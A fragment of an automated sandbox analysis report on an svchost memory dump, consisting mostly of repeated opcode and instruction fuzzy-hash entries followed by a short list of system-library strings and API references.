                                                                                            • Instruction ID: 550d48c5d2501edc3fb5a6699c1624780c5fcb7aa02c63a54cbce5dcdebee32f
                                                                                            • Opcode Fuzzy Hash: 8ea71efe9a902dc11e2f20bc60f5f2287d9a33bd699f8fcaa5256dd0d64046ab
                                                                                            • Instruction Fuzzy Hash: A3F02774A0430CEBCF14EBB9DA45E9EB7B8EF09304F1041AAE402EB3D0EA74DA008714
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b425683458b36015aea062c3d5a734d17ef5387a4241251d6dc09c74b50c86d
                                                                                            • Instruction ID: 6ef104c3e5a4b18a213a6993d832ac2b19988d953ab54c741273b27ff2656376
                                                                                            • Opcode Fuzzy Hash: 5b425683458b36015aea062c3d5a734d17ef5387a4241251d6dc09c74b50c86d
                                                                                            • Instruction Fuzzy Hash: 7FF08274A14348ABDB14EBA9DA45E6EB7B8EF44704F0404AAA901EB3C1EA74D9018755
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f45b5cf61fa98a58302badd4688afe0631e8a4380195cd2b4e2fea6d7e5a55b
                                                                                            • Instruction ID: 1c307cc8d6f9db428a611ada13e91b7745b30e3e1d434c668e2254853228184c
                                                                                            • Opcode Fuzzy Hash: 9f45b5cf61fa98a58302badd4688afe0631e8a4380195cd2b4e2fea6d7e5a55b
                                                                                            • Instruction Fuzzy Hash: 04F02773951A969FD721C32EC184B11B7D99F08774F0C80ABF4058F741CBA8CC80C251
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 45982d174c7a7194c462f46ca01dafdfc4752cddc91f5d6cee5f6d596fac5991
                                                                                            • Instruction ID: 50af4419705548532fd641c9c542bbcb829f6aab6fbdef7111521f89975bbbdb
                                                                                            • Opcode Fuzzy Hash: 45982d174c7a7194c462f46ca01dafdfc4752cddc91f5d6cee5f6d596fac5991
                                                                                            • Instruction Fuzzy Hash: 9FF08974A14248DBDB14EBA5DA45E6E77B4EF04308F040456A501DB3C1EA74D901C755
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                            • Instruction ID: cc3639708699b33f3e217780a3bc053540b6ccfb31a02fb15b913a0ea473a169
                                                                                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                            • Instruction Fuzzy Hash: F4F0E53360461467C230AA0D8C05F5BFBACDBD5B70F10471ABA649B2D0DA70A911D7D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 420dc8a6c2d171b249e6534ad8805fece9e7f7abfb581fd84e80b4676ba7a132
                                                                                            • Instruction ID: 97f1dec1c1cb2a0231a85d49e12b5e06522336799feb5dba1921d9b3f05c8eb6
                                                                                            • Opcode Fuzzy Hash: 420dc8a6c2d171b249e6534ad8805fece9e7f7abfb581fd84e80b4676ba7a132
                                                                                            • Instruction Fuzzy Hash: 29F08275A10348AFDB04EBA9DA59E9E77B8EF08704F05005AE541EB3C0D974D9019755
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction ID: d8b9f8f3ce6128362001d2ad11cd85a4320b1d83ba7fa17250fe40474574c3ba
                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction Fuzzy Hash: 38F06D7E204B44DBDB16DF1AD150AA57BA8EB46360F0444DAF8468B351EB31E982CB94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                            • Instruction ID: 3dcd295184362b39179723e88b3cd508f60b2b3fdb67deb98148697c0c983add
                                                                                            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                            • Instruction Fuzzy Hash: 7FE09276210200BFE764DB58CE49FE673ECEB40720F140269B119971D0DBB0BE40CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction ID: 77d2075e9afeeef6d68ab2e0df54db4a0504bb3a213196d68c54f1e257b2ccc7
                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction Fuzzy Hash: 89E052753003459FD715CF1AC054BA6B7BABFD9A50F28C069A8488F206EB36E942DB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                            • Instruction ID: bebb8406a9526c31a1da8972a3d9af41289572bbd4e274aa09faba94afa07283
                                                                                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                            • Instruction Fuzzy Hash: 3EE0CD35244314B7DB22AB44CD04F697B15DB507E0F104033FA085EB90C5B19C51D6D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction ID: 6df77792f9dd573587d72fd9da3d0319bce509369d3a577792f4e907219690ea
                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction Fuzzy Hash: 7CE08C35101A20EEDB35FF19DE04B527AA9FB84B10F14486BF0820A5A487B8A891DB54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                                            • Instruction ID: 1200c969e43a5743e8d64b2310c09a40d4fd98969fbbf5507d2f6ab88761736d
                                                                                            • Opcode Fuzzy Hash: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                                            • Instruction Fuzzy Hash: 0EF0ED34651B84CFE72ADF04C1E1B5273BDF755B44F50055DD4464BFA2C73A9941CA40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                                            • Instruction ID: 601dad5c80c12617f5d4743ce3e23024aaa2b594b4ad4ab87c3519fc28093661
                                                                                            • Opcode Fuzzy Hash: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                                            • Instruction Fuzzy Hash: 4DE0C2322006506BC722FF5DEE00F8A739EEFA5360F004222F1508B7D0CB64AC00C794
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction ID: 5ca58db2cdc55280e822d0ef860c04dbec8a2b73236f7070fd50ea0e26cf28eb
                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction Fuzzy Hash: 1ED0123631617097CF29E7596914F67AD159BC1AA4F1A006E780AD7940C9158C42D6E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction ID: 880e27663e21d8a20c9055a319c5d6904da45485ca8a29adbb4b079c6035c6ac
                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction Fuzzy Hash: 4DD0C935212E80CFDA1ACF0DC5A4B16B3B8BB84B44F8504D6E641CBB61D66CD940CE00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                            • Instruction ID: 632d3b0d76bb7d08aee6107e8458d0d5c7023bb214be5985c1e856d51f911031
                                                                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                            • Instruction Fuzzy Hash: 43D01735945AC48FE727CB08C165B917BF8F705B40F89009DE04247AA2C37C9984CB10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: 0c8f2f15a9ff17853e7808da0b1fe326ad6be17876a823b7d93c5f23639fae69
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: A8C01236250644AFC711EA94CD01F0177A9E798B40F004021F2044B670C571E820D644
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: 95bff0504406cec5cc201f72e0cf991c6552edae0daec6b6adc423965ac4311d
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 7ED01236100248EFCB01DF41D990D9A772AFBD8710F149019FD190B7108A31ED62DA50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 54cf3c959cba6ba43dd42daf1549acb4edaae4b9eb13ace2f51034a607eecbb7
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: A5C048B9B01A41CFCF15EB2AD398F4977E8FB84740F1948D1E805CBB21E624E811CA10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                                            • Instruction ID: 5d635efbf04ea7e90f25870dc8807114b4e00bb39f390a9a5b947059099fe3f3
                                                                                            • Opcode Fuzzy Hash: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                                            • Instruction Fuzzy Hash: 9990022130140802D102B2584454646400EC7D1345FD6C013E1424559D8B298A53A132
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                                            • Instruction ID: d9e24f8b6617e462a143ba2d99d78a6a6a85e7ba63dd81d1f0a27f8a403b8dd0
                                                                                            • Opcode Fuzzy Hash: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                                            • Instruction Fuzzy Hash: 5990023124140802D141B2584444646400E97D0341FD6C013A0424558E8B598B56AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                                            • Instruction ID: 3702aab53614c89fc6c766f202ce157726bd2c79021f55c8adddd5991e8c949d
                                                                                            • Opcode Fuzzy Hash: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                                            • Instruction Fuzzy Hash: F8900221242445525545F2584444547800B97E03417D6C013A1414954C8A2A9956D631
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                                            • Instruction ID: da7d611ebaac140cdcaa956a8a9830bc49e02b782710f09473408fd84780ea82
                                                                                            • Opcode Fuzzy Hash: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                                            • Instruction Fuzzy Hash: A490022130140403D140B2585458646800AD7E1301F96D012E0414558CDE1989565232
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                                            • Instruction ID: 202c1a662dbb0a8b21df97da26fdbef98c899174412a8f14635dcb71552abba8
                                                                                            • Opcode Fuzzy Hash: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                                            • Instruction Fuzzy Hash: BD90022120544842D100B6585448A46400A87D0305F96D012A1064599DCB398951A131
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                                            • Instruction ID: 30d74a254c04f7e8553604c7050cade66c232875b9a70b6c2cc632ce732dcee0
                                                                                            • Opcode Fuzzy Hash: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                                            • Instruction Fuzzy Hash: B090022921340402D180B258544864A400A87D1302FD6D416A001555CCCE1989695331
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                                            • Instruction ID: 672b4469694b36afb9e820c61ce8931173e1ebe7a4825f9cc632e706461aa190
                                                                                            • Opcode Fuzzy Hash: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                                            • Instruction Fuzzy Hash: B1900231202405429540B3585844A8E810A87E1302BD6D416A0015558CCE1889615231
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                                            • Instruction ID: 075ed57014af68d780c9e581c0fd3fd5d9054d15b653e7f65f31ac4293f73864
                                                                                            • Opcode Fuzzy Hash: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                                            • Instruction Fuzzy Hash: 5990023520140802D510B2585844686404B87D0301F96D412A042455CD8B5889A1A131
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                                            • Instruction ID: 806b039d6371e4f527156db2afec7b665d7abe141e3f5d8ac3d59411953d7dfb
                                                                                            • Opcode Fuzzy Hash: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                                            • Instruction Fuzzy Hash: 9C90023120140802D100B6985448686400A87E0301F96D012A5024559ECB6989916131
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                                            • Instruction ID: 91d7a4e47c06e320ca148faec19256fb603671885ea1973d301cb26e87b3080e
                                                                                            • Opcode Fuzzy Hash: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                                            • Instruction Fuzzy Hash: A390023120140803D100B2585548747400A87D0301F96D412A042455CDDB5A89516131
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                                            • Instruction ID: 6c875257121a20332aef1164de5238a92b1e09c82d1a6603dc0ec3062c1801e7
                                                                                            • Opcode Fuzzy Hash: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                                            • Instruction Fuzzy Hash: 2090022160540802D140B2585458746401A87D0301F96D012A0024558DCB5D8B5566B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                                            • Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
                                                                                            • Opcode Fuzzy Hash: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                                            • Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                                            • Instruction ID: 85a7ce7d1fba9afba6edc3cc0ec763e3c3ffde9bd170bc9b91b8edcd9a3683d3
                                                                                            • Opcode Fuzzy Hash: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                                            • Instruction Fuzzy Hash: 3D90023120148C02D110B258844478A400A87D0301F9AC412A442465CD8B9989917131
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: 753309e0dc3e3b2c57bf69f5c6ba90d10068aba477833187e49ad9ddd6b483c7
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Strings
• CLIENT(ntdll): Processing section info %ws..., xrefs: 03AA4787
• Execute=1, xrefs: 03AA4713
• ExecuteOptions, xrefs: 03AA46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03AA4725
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03AA46FC
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03AA4742
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
APIs
Strings
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
